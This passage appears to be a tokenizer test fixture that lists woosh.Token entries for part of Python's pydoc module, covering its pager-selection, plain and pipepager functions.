woosh.Token(woosh.NAME, 'stdout', 1560, 23, 1560, 29),
woosh.Token(woosh.OP, ',', 1560, 29, 1560, 30),
woosh.Token(woosh.STRING, '"isatty"', 1560, 31, 1560, 39),
woosh.Token(woosh.OP, ')', 1560, 39, 1560, 40),
woosh.Token(woosh.OP, ':', 1560, 40, 1560, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1560, 41, 1561, 0),
woosh.Token(woosh.INDENT, ' ', 1561, 0, 1561, 8),
woosh.Token(woosh.NAME, 'return', 1561, 8, 1561, 14),
woosh.Token(woosh.NAME, 'plainpager', 1561, 15, 1561, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1561, 25, 1562, 0),
woosh.Token(woosh.DEDENT, ' ', 1562, 0, 1562, 4),
woosh.Token(woosh.NAME, 'if', 1562, 4, 1562, 6),
woosh.Token(woosh.NAME, 'not', 1562, 7, 1562, 10),
woosh.Token(woosh.NAME, 'sys', 1562, 11, 1562, 14),
woosh.Token(woosh.OP, '.', 1562, 14, 1562, 15),
woosh.Token(woosh.NAME, 'stdin', 1562, 15, 1562, 20),
woosh.Token(woosh.OP, '.', 1562, 20, 1562, 21),
woosh.Token(woosh.NAME, 'isatty', 1562, 21, 1562, 27),
woosh.Token(woosh.OP, '(', 1562, 27, 1562, 28),
woosh.Token(woosh.OP, ')', 1562, 28, 1562, 29),
woosh.Token(woosh.NAME, 'or', 1562, 30, 1562, 32),
woosh.Token(woosh.NAME, 'not', 1562, 33, 1562, 36),
woosh.Token(woosh.NAME, 'sys', 1562, 37, 1562, 40),
woosh.Token(woosh.OP, '.', 1562, 40, 1562, 41),
woosh.Token(woosh.NAME, 'stdout', 1562, 41, 1562, 47),
woosh.Token(woosh.OP, '.', 1562, 47, 1562, 48),
woosh.Token(woosh.NAME, 'isatty', 1562, 48, 1562, 54),
woosh.Token(woosh.OP, '(', 1562, 54, 1562, 55),
woosh.Token(woosh.OP, ')', 1562, 55, 1562, 56),
woosh.Token(woosh.OP, ':', 1562, 56, 1562, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 1562, 57, 1563, 0),
woosh.Token(woosh.INDENT, ' ', 1563, 0, 1563, 8),
woosh.Token(woosh.NAME, 'return', 1563, 8, 1563, 14),
woosh.Token(woosh.NAME, 'plainpager', 1563, 15, 1563, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1563, 25, 1564, 0),
woosh.Token(woosh.DEDENT, ' ', 1564, 0, 1564, 4),
woosh.Token(woosh.NAME, 'use_pager', 1564, 4, 1564, 13),
woosh.Token(woosh.OP, '=', 1564, 14, 1564, 15),
woosh.Token(woosh.NAME, 'os', 1564, 16, 1564, 18),
woosh.Token(woosh.OP, '.', 1564, 18, 1564, 19),
woosh.Token(woosh.NAME, 'environ', 1564, 19, 1564, 26),
woosh.Token(woosh.OP, '.', 1564, 26, 1564, 27),
woosh.Token(woosh.NAME, 'get', 1564, 27, 1564, 30),
woosh.Token(woosh.OP, '(', 1564, 30, 1564, 31),
woosh.Token(woosh.STRING, "'MANPAGER'", 1564, 31, 1564, 41),
woosh.Token(woosh.OP, ')', 1564, 41, 1564, 42),
woosh.Token(woosh.NAME, 'or', 1564, 43, 1564, 45),
woosh.Token(woosh.NAME, 'os', 1564, 46, 1564, 48),
woosh.Token(woosh.OP, '.', 1564, 48, 1564, 49),
woosh.Token(woosh.NAME, 'environ', 1564, 49, 1564, 56),
woosh.Token(woosh.OP, '.', 1564, 56, 1564, 57),
woosh.Token(woosh.NAME, 'get', 1564, 57, 1564, 60),
woosh.Token(woosh.OP, '(', 1564, 60, 1564, 61),
woosh.Token(woosh.STRING, "'PAGER'", 1564, 61, 1564, 68),
woosh.Token(woosh.OP, ')', 1564, 68, 1564, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 1564, 69, 1565, 0),
woosh.Token(woosh.NAME, 'if', 1565, 4, 1565, 6),
woosh.Token(woosh.NAME, 'use_pager', 1565, 7, 1565, 16),
woosh.Token(woosh.OP, ':', 1565, 16, 1565, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1565, 17, 1566, 0),
woosh.Token(woosh.INDENT, ' ', 1566, 0, 1566, 8),
woosh.Token(woosh.NAME, 'if', 1566, 8, 1566, 10),
woosh.Token(woosh.NAME, 'sys', 1566, 11, 1566, 14),
woosh.Token(woosh.OP, '.', 1566, 14, 1566, 15),
woosh.Token(woosh.NAME, 'platform', 1566, 15, 1566, 23),
woosh.Token(woosh.OP, '==', 1566, 24, 1566, 26),
woosh.Token(woosh.STRING, "'win32'", 1566, 27, 1566, 34),
woosh.Token(woosh.OP, ':', 1566, 34, 1566, 35),
woosh.Token(woosh.COMMENT, '# pipes completely broken in Windows', 1566, 36, 1566, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 1566, 72, 1567, 0),
woosh.Token(woosh.INDENT, ' ', 1567, 0, 1567, 12),
woosh.Token(woosh.NAME, 'return', 1567, 12, 1567, 18),
woosh.Token(woosh.NAME, 'lambda', 1567, 19, 1567, 25),
woosh.Token(woosh.NAME, 'text', 1567, 26, 1567, 30),
woosh.Token(woosh.OP, ':', 1567, 30, 1567, 31),
woosh.Token(woosh.NAME, 'tempfilepager', 1567, 32, 1567, 45),
woosh.Token(woosh.OP, '(', 1567, 45, 1567, 46),
woosh.Token(woosh.NAME, 'plain', 1567, 46, 1567, 51),
woosh.Token(woosh.OP, '(', 1567, 51, 1567, 52),
woosh.Token(woosh.NAME, 'text', 1567, 52, 1567, 56),
woosh.Token(woosh.OP, ')', 1567, 56, 1567, 57),
woosh.Token(woosh.OP, ',', 1567, 57, 1567, 58),
woosh.Token(woosh.NAME, 'use_pager', 1567, 59, 1567, 68),
woosh.Token(woosh.OP, ')', 1567, 68, 1567, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 1567, 69, 1568, 0),
woosh.Token(woosh.DEDENT, ' ', 1568, 0, 1568, 8),
woosh.Token(woosh.NAME, 'elif', 1568, 8, 1568, 12),
woosh.Token(woosh.NAME, 'os', 1568, 13, 1568, 15),
woosh.Token(woosh.OP, '.', 1568, 15, 1568, 16),
woosh.Token(woosh.NAME, 'environ', 1568, 16, 1568, 23),
woosh.Token(woosh.OP, '.', 1568, 23, 1568, 24),
woosh.Token(woosh.NAME, 'get', 1568, 24, 1568, 27),
woosh.Token(woosh.OP, '(', 1568, 27, 1568, 28),
woosh.Token(woosh.STRING, "'TERM'", 1568, 28, 1568, 34),
woosh.Token(woosh.OP, ')', 1568, 34, 1568, 35),
woosh.Token(woosh.NAME, 'in', 1568, 36, 1568, 38),
woosh.Token(woosh.OP, '(', 1568, 39, 1568, 40),
woosh.Token(woosh.STRING, "'dumb'", 1568, 40, 1568, 46),
woosh.Token(woosh.OP, ',', 1568, 46, 1568, 47),
woosh.Token(woosh.STRING, "'emacs'", 1568, 48, 1568, 55),
woosh.Token(woosh.OP, ')', 1568, 55, 1568, 56),
woosh.Token(woosh.OP, ':', 1568, 56, 1568, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 1568, 57, 1569, 0),
woosh.Token(woosh.INDENT, ' ', 1569, 0, 1569, 12),
woosh.Token(woosh.NAME, 'return', 1569, 12, 1569, 18),
woosh.Token(woosh.NAME, 'lambda', 1569, 19, 1569, 25),
woosh.Token(woosh.NAME, 'text', 1569, 26, 1569, 30),
woosh.Token(woosh.OP, ':', 1569, 30, 1569, 31),
woosh.Token(woosh.NAME, 'pipepager', 1569, 32, 1569, 41),
woosh.Token(woosh.OP, '(', 1569, 41, 1569, 42),
woosh.Token(woosh.NAME, 'plain', 1569, 42, 1569, 47),
woosh.Token(woosh.OP, '(', 1569, 47, 1569, 48),
woosh.Token(woosh.NAME, 'text', 1569, 48, 1569, 52),
woosh.Token(woosh.OP, ')', 1569, 52, 1569, 53),
woosh.Token(woosh.OP, ',', 1569, 53, 1569, 54),
woosh.Token(woosh.NAME, 'use_pager', 1569, 55, 1569, 64),
woosh.Token(woosh.OP, ')', 1569, 64, 1569, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 1569, 65, 1570, 0),
woosh.Token(woosh.DEDENT, ' ', 1570, 0, 1570, 8),
woosh.Token(woosh.NAME, 'else', 1570, 8, 1570, 12),
woosh.Token(woosh.OP, ':', 1570, 12, 1570, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1570, 13, 1571, 0),
woosh.Token(woosh.INDENT, ' ', 1571, 0, 1571, 12),
woosh.Token(woosh.NAME, 'return', 1571, 12, 1571, 18),
woosh.Token(woosh.NAME, 'lambda', 1571, 19, 1571, 25),
woosh.Token(woosh.NAME, 'text', 1571, 26, 1571, 30),
woosh.Token(woosh.OP, ':', 1571, 30, 1571, 31),
woosh.Token(woosh.NAME, 'pipepager', 1571, 32, 1571, 41),
woosh.Token(woosh.OP, '(', 1571, 41, 1571, 42),
woosh.Token(woosh.NAME, 'text', 1571, 42, 1571, 46),
woosh.Token(woosh.OP, ',', 1571, 46, 1571, 47),
woosh.Token(woosh.NAME, 'use_pager', 1571, 48, 1571, 57),
woosh.Token(woosh.OP, ')', 1571, 57, 1571, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 1571, 58, 1572, 0),
woosh.Token(woosh.DEDENT, ' ', 1572, 0, 1572, 4),
woosh.Token(woosh.DEDENT, '', 1572, 4, 1572, 4),
woosh.Token(woosh.NAME, 'if', 1572, 4, 1572, 6),
woosh.Token(woosh.NAME, 'os', 1572, 7, 1572, 9),
woosh.Token(woosh.OP, '.', 1572, 9, 1572, 10),
woosh.Token(woosh.NAME, 'environ', 1572, 10, 1572, 17),
woosh.Token(woosh.OP, '.', 1572, 17, 1572, 18),
woosh.Token(woosh.NAME, 'get', 1572, 18, 1572, 21),
woosh.Token(woosh.OP, '(', 1572, 21, 1572, 22),
woosh.Token(woosh.STRING, "'TERM'", 1572, 22, 1572, 28),
woosh.Token(woosh.OP, ')', 1572, 28, 1572, 29),
woosh.Token(woosh.NAME, 'in', 1572, 30, 1572, 32),
woosh.Token(woosh.OP, '(', 1572, 33, 1572, 34),
woosh.Token(woosh.STRING, "'dumb'", 1572, 34, 1572, 40),
woosh.Token(woosh.OP, ',', 1572, 40, 1572, 41),
woosh.Token(woosh.STRING, "'emacs'", 1572, 42, 1572, 49),
woosh.Token(woosh.OP, ')', 1572, 49, 1572, 50),
woosh.Token(woosh.OP, ':', 1572, 50, 1572, 51),
woosh.Token(woosh.NEWLINE, '\r\n', 1572, 51, 1573, 0),
woosh.Token(woosh.INDENT, ' ', 1573, 0, 1573, 8),
woosh.Token(woosh.NAME, 'return', 1573, 8, 1573, 14),
woosh.Token(woosh.NAME, 'plainpager', 1573, 15, 1573, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1573, 25, 1574, 0),
woosh.Token(woosh.DEDENT, ' ', 1574, 0, 1574, 4),
woosh.Token(woosh.NAME, 'if', 1574, 4, 1574, 6),
woosh.Token(woosh.NAME, 'sys', 1574, 7, 1574, 10),
woosh.Token(woosh.OP, '.', 1574, 10, 1574, 11),
woosh.Token(woosh.NAME, 'platform', 1574, 11, 1574, 19),
woosh.Token(woosh.OP, '==', 1574, 20, 1574, 22),
woosh.Token(woosh.STRING, "'win32'", 1574, 23, 1574, 30),
woosh.Token(woosh.OP, ':', 1574, 30, 1574, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1574, 31, 1575, 0),
woosh.Token(woosh.INDENT, ' ', 1575, 0, 1575, 8),
woosh.Token(woosh.NAME, 'return', 1575, 8, 1575, 14),
woosh.Token(woosh.NAME, 'lambda', 1575, 15, 1575, 21),
woosh.Token(woosh.NAME, 'text', 1575, 22, 1575, 26),
woosh.Token(woosh.OP, ':', 1575, 26, 1575, 27),
woosh.Token(woosh.NAME, 'tempfilepager', 1575, 28, 1575, 41),
woosh.Token(woosh.OP, '(', 1575, 41, 1575, 42),
woosh.Token(woosh.NAME, 'plain', 1575, 42, 1575, 47),
woosh.Token(woosh.OP, '(', 1575, 47, 1575, 48),
woosh.Token(woosh.NAME, 'text', 1575, 48, 1575, 52),
woosh.Token(woosh.OP, ')', 1575, 52, 1575, 53),
woosh.Token(woosh.OP, ',', 1575, 53, 1575, 54),
woosh.Token(woosh.STRING, "'more <'", 1575, 55, 1575, 63),
woosh.Token(woosh.OP, ')', 1575, 63, 1575, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 1575, 64, 1576, 0),
woosh.Token(woosh.DEDENT, ' ', 1576, 0, 1576, 4),
woosh.Token(woosh.NAME, 'if', 1576, 4, 1576, 6),
woosh.Token(woosh.NAME, 'hasattr', 1576, 7, 1576, 14),
woosh.Token(woosh.OP, '(', 1576, 14, 1576, 15),
woosh.Token(woosh.NAME, 'os', 1576, 15, 1576, 17),
woosh.Token(woosh.OP, ',', 1576, 17, 1576, 18),
woosh.Token(woosh.STRING, "'system'", 1576, 19, 1576, 27),
woosh.Token(woosh.OP, ')', 1576, 27, 1576, 28),
woosh.Token(woosh.NAME, 'and', 1576, 29, 1576, 32),
woosh.Token(woosh.NAME, 'os', 1576, 33, 1576, 35),
woosh.Token(woosh.OP, '.', 1576, 35, 1576, 36),
woosh.Token(woosh.NAME, 'system', 1576, 36, 1576, 42),
woosh.Token(woosh.OP, '(', 1576, 42, 1576, 43),
woosh.Token(woosh.STRING, "'(less) 2>/dev/null'", 1576, 43, 1576, 63),
woosh.Token(woosh.OP, ')', 1576, 63, 1576, 64),
woosh.Token(woosh.OP, '==', 1576, 65, 1576, 67),
woosh.Token(woosh.NUMBER, '0', 1576, 68, 1576, 69),
woosh.Token(woosh.OP, ':', 1576, 69, 1576, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 1576, 70, 1577, 0),
woosh.Token(woosh.INDENT, ' ', 1577, 0, 1577, 8),
woosh.Token(woosh.NAME, 'return', 1577, 8, 1577, 14),
woosh.Token(woosh.NAME, 'lambda', 1577, 15, 1577, 21),
woosh.Token(woosh.NAME, 'text', 1577, 22, 1577, 26),
woosh.Token(woosh.OP, ':', 1577, 26, 1577, 27),
woosh.Token(woosh.NAME, 'pipepager', 1577, 28, 1577, 37),
woosh.Token(woosh.OP, '(', 1577, 37, 1577, 38),
woosh.Token(woosh.NAME, 'text', 1577, 38, 1577, 42),
woosh.Token(woosh.OP, ',', 1577, 42, 1577, 43),
woosh.Token(woosh.STRING, "'less'", 1577, 44, 1577, 50),
woosh.Token(woosh.OP, ')', 1577, 50, 1577, 51),
woosh.Token(woosh.NEWLINE, '\r\n', 1577, 51, 1578, 0),
woosh.Token(woosh.DEDENT, ' ', 1579, 0, 1579, 4),
woosh.Token(woosh.NAME, 'import', 1579, 4, 1579, 10),
woosh.Token(woosh.NAME, 'tempfile', 1579, 11, 1579, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 1579, 19, 1580, 0),
woosh.Token(woosh.OP, '(', 1580, 4, 1580, 5),
woosh.Token(woosh.NAME, 'fd', 1580, 5, 1580, 7),
woosh.Token(woosh.OP, ',', 1580, 7, 1580, 8),
woosh.Token(woosh.NAME, 'filename', 1580, 9, 1580, 17),
woosh.Token(woosh.OP, ')', 1580, 17, 1580, 18),
woosh.Token(woosh.OP, '=', 1580, 19, 1580, 20),
woosh.Token(woosh.NAME, 'tempfile', 1580, 21, 1580, 29),
woosh.Token(woosh.OP, '.', 1580, 29, 1580, 30),
woosh.Token(woosh.NAME, 'mkstemp', 1580, 30, 1580, 37),
woosh.Token(woosh.OP, '(', 1580, 37, 1580, 38),
woosh.Token(woosh.OP, ')', 1580, 38, 1580, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 1580, 39, 1581, 0),
woosh.Token(woosh.NAME, 'os', 1581, 4, 1581, 6),
woosh.Token(woosh.OP, '.', 1581, 6, 1581, 7),
woosh.Token(woosh.NAME, 'close', 1581, 7, 1581, 12),
woosh.Token(woosh.OP, '(', 1581, 12, 1581, 13),
woosh.Token(woosh.NAME, 'fd', 1581, 13, 1581, 15),
woosh.Token(woosh.OP, ')', 1581, 15, 1581, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1581, 16, 1582, 0),
woosh.Token(woosh.NAME, 'try', 1582, 4, 1582, 7),
woosh.Token(woosh.OP, ':', 1582, 7, 1582, 8),
woosh.Token(woosh.NEWLINE, '\r\n', 1582, 8, 1583, 0),
woosh.Token(woosh.INDENT, ' ', 1583, 0, 1583, 8),
woosh.Token(woosh.NAME, 'if', 1583, 8, 1583, 10),
woosh.Token(woosh.NAME, 'hasattr', 1583, 11, 1583, 18),
woosh.Token(woosh.OP, '(', 1583, 18, 1583, 19),
woosh.Token(woosh.NAME, 'os', 1583, 19, 1583, 21),
woosh.Token(woosh.OP, ',', 1583, 21, 1583, 22),
woosh.Token(woosh.STRING, "'system'", 1583, 23, 1583, 31),
woosh.Token(woosh.OP, ')', 1583, 31, 1583, 32),
woosh.Token(woosh.NAME, 'and', 1583, 33, 1583, 36),
woosh.Token(woosh.NAME, 'os', 1583, 37, 1583, 39),
woosh.Token(woosh.OP, '.', 1583, 39, 1583, 40),
woosh.Token(woosh.NAME, 'system', 1583, 40, 1583, 46),
woosh.Token(woosh.OP, '(', 1583, 46, 1583, 47),
woosh.Token(woosh.STRING, '\'more "%s"\'', 1583, 47, 1583, 58),
woosh.Token(woosh.OP, '%', 1583, 59, 1583, 60),
woosh.Token(woosh.NAME, 'filename', 1583, 61, 1583, 69),
woosh.Token(woosh.OP, ')', 1583, 69, 1583, 70),
woosh.Token(woosh.OP, '==', 1583, 71, 1583, 73),
woosh.Token(woosh.NUMBER, '0', 1583, 74, 1583, 75),
woosh.Token(woosh.OP, ':', 1583, 75, 1583, 76),
woosh.Token(woosh.NEWLINE, '\r\n', 1583, 76, 1584, 0),
woosh.Token(woosh.INDENT, ' ', 1584, 0, 1584, 12),
woosh.Token(woosh.NAME, 'return', 1584, 12, 1584, 18),
woosh.Token(woosh.NAME, 'lambda', 1584, 19, 1584, 25),
woosh.Token(woosh.NAME, 'text', 1584, 26, 1584, 30),
woosh.Token(woosh.OP, ':', 1584, 30, 1584, 31),
woosh.Token(woosh.NAME, 'pipepager', 1584, 32, 1584, 41),
woosh.Token(woosh.OP, '(', 1584, 41, 1584, 42),
woosh.Token(woosh.NAME, 'text', 1584, 42, 1584, 46),
woosh.Token(woosh.OP, ',', 1584, 46, 1584, 47),
woosh.Token(woosh.STRING, "'more'", 1584, 48, 1584, 54),
woosh.Token(woosh.OP, ')', 1584, 54, 1584, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 1584, 55, 1585, 0),
woosh.Token(woosh.DEDENT, ' ', 1585, 0, 1585, 8),
woosh.Token(woosh.NAME, 'else', 1585, 8, 1585, 12),
woosh.Token(woosh.OP, ':', 1585, 12, 1585, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1585, 13, 1586, 0),
woosh.Token(woosh.INDENT, ' ', 1586, 0, 1586, 12),
woosh.Token(woosh.NAME, 'return', 1586, 12, 1586, 18),
woosh.Token(woosh.NAME, 'ttypager', 1586, 19, 1586, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 1586, 27, 1587, 0),
woosh.Token(woosh.DEDENT, ' ', 1587, 0, 1587, 4),
woosh.Token(woosh.DEDENT, '', 1587, 4, 1587, 4),
woosh.Token(woosh.NAME, 'finally', 1587, 4, 1587, 11),
woosh.Token(woosh.OP, ':', 1587, 11, 1587, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 1587, 12, 1588, 0),
woosh.Token(woosh.INDENT, ' ', 1588, 0, 1588, 8),
woosh.Token(woosh.NAME, 'os', 1588, 8, 1588, 10),
woosh.Token(woosh.OP, '.', 1588, 10, 1588, 11),
woosh.Token(woosh.NAME, 'unlink', 1588, 11, 1588, 17),
woosh.Token(woosh.OP, '(', 1588, 17, 1588, 18),
woosh.Token(woosh.NAME, 'filename', 1588, 18, 1588, 26),
woosh.Token(woosh.OP, ')', 1588, 26, 1588, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 1588, 27, 1589, 0),
woosh.Token(woosh.DEDENT, '', 1590, 0, 1590, 0),
woosh.Token(woosh.DEDENT, '', 1590, 0, 1590, 0),
woosh.Token(woosh.NAME, 'def', 1590, 0, 1590, 3),
woosh.Token(woosh.NAME, 'plain', 1590, 4, 1590, 9),
woosh.Token(woosh.OP, '(', 1590, 9, 1590, 10),
woosh.Token(woosh.NAME, 'text', 1590, 10, 1590, 14),
woosh.Token(woosh.OP, ')', 1590, 14, 1590, 15),
woosh.Token(woosh.OP, ':', 1590, 15, 1590, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1590, 16, 1591, 0),
woosh.Token(woosh.INDENT, ' ', 1591, 0, 1591, 4),
woosh.Token(woosh.STRING, '"""Remove boldface formatting from text."""', 1591, 4, 1591, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 1591, 47, 1592, 0),
woosh.Token(woosh.NAME, 'return', 1592, 4, 1592, 10),
woosh.Token(woosh.NAME, 're', 1592, 11, 1592, 13),
woosh.Token(woosh.OP, '.', 1592, 13, 1592, 14),
woosh.Token(woosh.NAME, 'sub', 1592, 14, 1592, 17),
woosh.Token(woosh.OP, '(', 1592, 17, 1592, 18),
woosh.Token(woosh.STRING, "'.\\b'", 1592, 18, 1592, 23),
woosh.Token(woosh.OP, ',', 1592, 23, 1592, 24),
woosh.Token(woosh.STRING, "''", 1592, 25, 1592, 27),
woosh.Token(woosh.OP, ',', 1592, 27, 1592, 28),
woosh.Token(woosh.NAME, 'text', 1592, 29, 1592, 33),
woosh.Token(woosh.OP, ')', 1592, 33, 1592, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 1592, 34, 1593, 0),
woosh.Token(woosh.DEDENT, '', 1594, 0, 1594, 0),
woosh.Token(woosh.NAME, 'def', 1594, 0, 1594, 3),
woosh.Token(woosh.NAME, 'pipepager', 1594, 4, 1594, 13),
woosh.Token(woosh.OP, '(', 1594, 13, 1594, 14),
woosh.Token(woosh.NAME, 'text', 1594, 14, 1594, 18),
woosh.Token(woosh.OP, ',', 1594, 18, 1594, 19),
woosh.Token(woosh.NAME, 'cmd', 1594, 20, 1594, 23),
woosh.Token(woosh.OP, ')', 1594, 23, 1594, 24),
woosh.Token(woosh.OP, ':', 1594, 24, 1594, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1594, 25, 1595, 0),
woosh.Token(woosh.INDENT, ' ', 1595, 0, 1595, 4),
woosh.Token(woosh.STRING, '"""Page through text by feeding it to another program."""', 1595, 4, 1595, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 1595, 61, 1596, 0),
woosh.Token(woosh.NAME, 'import', 1596, 4, 1596, 10),
woosh.Token(woosh.NAME, 'subprocess', 1596, 11, 1596, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1596, 21, 1597, 0),
woosh.Token(woosh.NAME, 'proc', 1597, 4, 1597, 8),
woosh.Token(woosh.OP, '=', 1597, 9, 1597, 10),
woosh.Token(woosh.NAME, 'subprocess', 1597, 11, 1597, 21),
woosh.Token(woosh.OP, '.', 1597, 21, 1597, 22),
woosh.Token(woosh.NAME, 'Popen', 1597, 22, 1597, 27),
woosh.Token(woosh.OP, '(', 1597, 27, 1597, 28),
woosh.Token(woosh.NAME, 'cmd', 1597, 28, 1597, 31),
woosh.Token(woosh.OP, ',', 1597, 31, 1597, 32),
woosh.Token(woosh.NAME, 'shell', 1597, 33, 1597, 38),
woosh.Token(woosh.OP, '=', 1597, 38, 1597, 39),
woosh.Token(woosh.NAME, 'True', 1597, 39, 1597, 43),
woosh.Token(woosh.OP, ',', 1597, 43, 1597, 44),
woosh.Token(woosh.NAME, 'stdin', 1597, 45, 1597, 50),
woosh.Token(woosh.OP, '=', 1597, 50, 1597, 51),
woosh.Token(woosh.NAME, 'subprocess', 1597, 51, 1597, 61),
woosh.Token(woosh.OP, '.', 1597, 61, 1597, 62),
woosh.Token(woosh.NAME, 'PIPE', 1597, 62, 1597, 66),
woosh.Token(woosh.OP, ')', 1597, 66, 1597, 67),
woosh.Token(woosh.NEWLINE, '\r\n', 1597, 67, 1598, 0),
woosh.Token(woosh.NAME, 'try', 1598, 4, 1598, 7),
woosh.Token(woosh.OP, ':', 1598, 7, 1598, 8),
woosh.Token(woosh.NEWLINE, '\r\n', 1598, 8, 1599, 0),
woosh.Token(woosh.INDENT, ' ', 1599, 0, 1599, 8),
woosh.Token(woosh.NAME, 'with', 1599, 8, 1599, 12),
woosh.Token(woosh.NAME, 'io', 1599, 13, 1599, 15),
woosh.Token(woosh.OP, '.', 1599, 15, 1599, 16),
woosh.Token(woosh.NAME, 'TextIOWrapper', 1599, 16, 1599, 29),
woosh.Token(woosh.OP, '(', 1599, 29, 1599, 30),
woosh.Token(woosh.NAME, 'proc', 1599, 30, 1599, 34),
woosh.Token(woosh.OP, '.', 1599, 34, 1599, 35),
woosh.Token(woosh.NAME, 'stdin', 1599, 35, 1599, 40),
woosh.Token(woosh.OP, ',', 1599, 40, 1599, 41),
woosh.Token(woosh.NAME, 'errors', 1599, 42, 1599, 48),
woosh.Token(woosh.OP, '=', 1599, 48, 1599, 49),
woosh.Token(woosh.STRING, "'backslashreplace'", 1599, 49, 1599, 67),
woosh.Token(woosh.OP, ')', 1599, 67, 1599, 68),
woosh.Token(woosh.NAME, 'as', 1599, 69, 1599, 71),
woosh.Token(woosh.NAME, 'pipe', 1599, 72, 1599, 76),
woosh.Token(woosh.OP, ':', 1599, 76, 1599, 77),
woosh.Token(woosh.NEWLINE, '\r\n', 1599, 77, 1600, 0),
woosh.Token(woosh.INDENT, ' ', 1600, 0, 1600, 12),
woosh.Token(woosh.NAME, 'try', 1600, 12, 1600, 15),
woosh.Token(woosh.OP, ':', 1600, 15, 1600, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1600, 16, 1601, 0),
woosh.Token(woosh.INDENT, ' ', 1601, 0, 1601, 16),
woosh.Token(woosh.NAME, 'pipe', 1601, 16, 1601, 20),
woosh.Token(woosh.OP, '.', 1601, 20, 1601, 21),
woosh.Token(woosh.NAME, 'write', 1601, 21, 1601, 26),
woosh.Token(woosh.OP, '(', 1601, 26, 1601, 27),
woosh.Token(woosh.NAME, 'text', 1601, 27, 1601, 31),
woosh.Token(woosh.OP, ')', 1601, 31, 1601, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 1601, 32, 1602, 0),
woosh.Token(woosh.DEDENT, ' ', 1602, 0, 1602, 12),
woosh.Token(woosh.NAME, 'except', 1602, 12, 1602, 18),
woosh.Token(woosh.NAME, 'KeyboardInterrupt', 1602, 19, 1602, 36),
woosh.Token(woosh.OP, ':', 1602, 36, 1602, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 1602, 37, 1603, 0),
woosh.Token(woosh.COMMENT, "# We've hereby abandoned whatever text hasn't been written,", 1603, 16, 1603, 75),
woosh.Token(woosh.COMMENT, '# but the pager is still in control of the terminal.', 1604, 16, 1604, 68),
woosh.Token(woosh.INDENT, ' ', 1605, 0, 1605, 16),
woosh.Token(woosh.NAME, 'pass', 1605, 16, 1605, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1605, 20, 1606, 0),
woosh.Token(woosh.DEDENT, ' ', 1606, 0, 1606, 4),
woosh.Token(woosh.DEDENT, '', 1606, 4, 1606, 4),
woosh.Token(woosh.DEDENT, '', 1606, 4, 1606, 4),
woosh.Token(woosh.NAME, 'except', 1606, 4, 1606, 10),
woosh.Token(woosh.NAME, 'OSError', 1606, 11, 1606, 18),
woosh.Token(woosh.OP, ':', 1606, 18, 1606, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 1606, 19, 1607, 0),
woosh.Token(woosh.INDENT, ' ', 1607, 0, 1607, 8),
woosh.Token(woosh.NAME, 'pass', 1607, 8, 1607, 12),
woosh.Token(woosh.COMMENT, '# Ignore broken pipes caused by quitting the pager program.', 1607, 13, 1607, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 1607, 72, 1608, 0),
woosh.Token(woosh.DEDENT, ' ', 1608, 0, 1608, 4),
woosh.Token(woosh.NAME, 'while', 1608, 4, 1608, 9),
woosh.Token(woosh.NAME, 'True', 1608, 10, 1608, 14),
woosh.Token(woosh.OP, ':', 1608, 14, 1608, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 1608, 15, 1609, 0),
woosh.Token(woosh.INDENT, ' ', 1609, 0, 1609, 8),
woosh.Token(woosh.NAME, 'try', 1609, 8, 1609, 11),
woosh.Token(woosh.OP, ':', 1609, 11, 1609, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 1609, 12, 1610, 0),
woosh.Token(woosh.INDENT, ' ', 1610, 0, 1610, 12),
woosh.Token(woosh.NAME, 'proc', 1610, 12, 1610, 16),
woosh.Token(woosh.OP, '.', 1610, 16, 1610, 17),
woosh.Token(woosh.NAME, 'wait', 1610, 17, 1610, 21),
woosh.Token(woosh.OP, '(', 1610, 21, 1610, 22),
woosh.Token(woosh.OP, ')', 1610, 22, 1610, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1610, 23, 1611, 0),
woosh.Token(woosh.NAME, 'break', 1611, 12, 1611, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1611, 17, 1612, 0),
woosh.Token(woosh.DEDENT, ' ', 1612, 0, 1612, 8),
woosh.Token(woosh.NAME, 'except', 1612, 8, 1612, 14),
woosh.Token(woosh.NAME, 'KeyboardInterrupt', 1612, 15, 1612, 32),
woosh.Token(woosh.OP, ':', 1612, 32, 1612, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 1612, 33, 1613, 0),
woosh.Token(woosh.COMMENT, '# Ignore ctl-c like the pager itself does. Otherwise the pager is', 1613, 12, 1613, 78),
woosh.Token(woosh.COMMENT, '# left running and the terminal is in raw mode and unusable.', 1614, 12, 1614, 72),
